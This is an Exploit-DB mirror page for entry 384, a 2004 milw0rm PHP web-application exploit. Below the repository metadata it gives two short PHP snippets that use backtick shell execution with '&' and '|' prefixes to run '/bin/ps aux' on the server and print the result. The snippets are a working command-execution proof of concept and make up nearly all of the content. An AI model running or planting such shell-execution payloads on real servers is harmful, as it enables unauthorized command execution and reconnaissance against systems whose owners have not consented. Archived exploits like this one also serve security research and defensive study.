exploit-db-mirror/exploits/php/webapps/384.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

12 lines
No EOL
135 B
Text

<?php
$blah = `& /bin/ps aux`;
echo nl2br($blah);
?>
<?php
$blah = `| /bin/ps aux`;
echo nl2br($blah);
?>
# milw0rm.com [2004-08-08]